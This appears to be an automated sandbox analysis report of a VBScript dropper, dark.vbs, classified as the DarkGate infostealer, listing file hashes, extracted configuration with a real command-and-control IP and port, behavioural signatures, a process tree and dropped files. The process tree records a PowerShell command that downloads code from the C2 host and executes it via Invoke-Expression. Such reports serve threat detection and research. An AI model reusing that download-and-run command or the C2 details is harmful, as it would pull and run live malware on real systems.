Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-03-2024 12:49

General

  • Target

    dark.vbs

  • Size

    5KB

  • MD5

    3b2e1c5604f68a43495f3829c31f12e3

  • SHA1

    ddc0158fa56458c9235598fdbf2ff49d87c93bb1

  • SHA256

    ad806df85dfb29cca1f3a2c99ed069c30cd870bae9d47f2de4c7ce727b9622ec

  • SHA512

    853b8afbffbbf8a24639f27fd2ddd5b5713e85f7ddcd8a020a050ba40fcf391cf29aa047cfc335b69b5828b740f145b6b27b1149f07234817b991545b3ab38f6

  • SSDEEP

    96:DaUEmyDTEBzylU+/V9rkcQ3tZUHg4KRZZoPC8Wuo9d3uV0m:DaU0TEBzj+/V9g/tZUHg4KR/oa8Wuo9I

Malware Config

Extracted

Family

darkgate

Botnet

pruebasvbs

C2

149.56.252.31

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    8094

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    mwsMGaLY

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    pruebasvbs

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Detect DarkGate stealer 11 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3940
      • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:3788
      • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        2⤵
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:3736
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dark.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4348
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '149.56.252.31:8094/mgmmrccw')
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2180
        • C:\temp\AutoIt3.exe
          "C:\temp\AutoIt3.exe" script.a3x
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2448


    Downloads

    • C:\ProgramData\bbchbhh\habbcbd.a3x

      Filesize

      468KB

      MD5

      f615af806a9d74b5512d27cc40ecac13

      SHA1

      53d4eae842670cde517d0ecbf7f29602ae3a2804

      SHA256

      6d977dfe2c8227a40bb15a8c61de7307de8f09d3c36ad6bedf51162a283b3200

      SHA512

      69f560491cff9f36d88590e25113f2dbf7bed8b07c45503cb036f58ece99d80e26580bc3ef9c1f7fe644e9abd76b5c256e7fd4185dac5e9615b33d167ec0c7f0

    • C:\ProgramData\bbchbhh\kfbefdf

      Filesize

      1KB

      MD5

      48f1eb7047b38a15434719b91e15c54d

      SHA1

      96fb025fe59a59d5c165569854612633c6192ef8

      SHA256

      e2c4b73903586e4f2293e74b55edbfcbd4d55696362d19e730caedad3d7736ec

      SHA512

      0d40a23a8cd859096783d8fa3cd95f682a2b7fad01191a36a3b6748c784c0ee64d7ce8d063c9ea5083f668c59b86d10cf6afb8ca8db88fea325bde963b3150d8

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vblciyjf.z3s.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\CaeDKGe

      Filesize

      32B

      MD5

      64c7060c88c4cf5447c4dfe8d96317e3

      SHA1

      3cf40488a556ea3524466089f45842f1e5cac53a

      SHA256

      bc026c0f0c355ded85e75c3f15b1eaad5be65d727b458bbbbd7a5042c2628c3c

      SHA512

      c7f158ee015dd1e7c729eee64fe77a85effbe26d1bf727d8d56f34efda1babb3752eaac3e23d8289b1f11f606f521a12499cdae9276a6d458e4918a2e3548072

    • C:\temp\AutoIt3.exe

      Filesize

      872KB

      MD5

      c56b5f0201a3b3de53e561fe76912bfd

      SHA1

      2a4062e10a5de813f5688221dbeb3f3ff33eb417

      SHA256

      237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

      SHA512

      195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

    • C:\temp\aaddddf

      Filesize

      4B

      MD5

      3ee6674c0e38402dd8ca5e134dfd494e

      SHA1

      6c019165e99d924ff521321d3193a5a4172cc3dd

      SHA256

      1512933308b0a6adf128e2dcf39a53cb0e373f5aa284ee803d7aab65e2a08dfa

      SHA512

      53d789280e0ad3be6d175c478a129720b3caa1d936eb5dddd7ea860aac39bfdf2f84a9cd492a9f8d94840f864d3cda8dd5236584503bf2e8ed6c41f5b05caec1

    • C:\temp\aaddddf

      Filesize

      4B

      MD5

      c4aed02c53d676c8f5e452dca7d6fab7

      SHA1

      925ba57e7505a7f7bfe0e250c6abdcef092da2fc

      SHA256

      6df497859afb971b8f3b5f296b49ed63bfbc76dda73afb53bd068156de602b23

      SHA512

      e5e59fa83a2c11443fd2a7b9ee33de2de7cc63231c561a7c8563f6cd5203b7f2dfa0b99f9b829270c3e93625e1ff826ffd78aad631acc6b10321657438773589

    • C:\temp\fbdcgeg

      Filesize

      4B

      MD5

      873bd2a70542edd8915e4c2dba0d4e98

      SHA1

      826e2db10ac48f0ed0af099f458f14aea275987d

      SHA256

      a53ae32c02606a8d278094117f483b13b44d37ebaa630a11628e50a9ae3db40f

      SHA512

      af4525c44cdec8deef881db8ea93134b80a2ced0720b66ddd4bcf71c46d5ed831db6b1515677ff9e6a289f10c286304deb2cadf5230ddc2d8a26d5d9a51f7630

    • C:\temp\script.a3x

      Filesize

      467KB

      MD5

      50862376b34880a80a32406444f4a8cb

      SHA1

      20997faf801af300f4524b5a785d1f246bb79f49

      SHA256

      508251503639845117e170fe5ae1b0d7b8953e8336119a71d04e7bdce962d980

      SHA512

      c17fc05332ce333f3dcae3e6d0524386500953cb48e55996516913cdb9b415d4c940c59a8311efc31663ae4c6710f44b18ba63016cb9f100ffe8edf0985a0f7d

    • C:\temp\test.txt

      Filesize

      76B

      MD5

      e12c09ed641531b7225b26ff6991a506

      SHA1

      697ec598b870b394d237b9bccf4eef18e1619ee5

      SHA256

      692f4ba2a4bce266d9228dd0a3e11a5cd2e4b201b5ce459eef64dcb9d043f73c

      SHA512

      8370d91bc0dc6c0e924e45658f6e62ec04d3f2654133c6799ab0e7f839a52556db4e04615dadda9fc97a88b3a18916e4fb286efccc6713b9a4e8cd8700915b83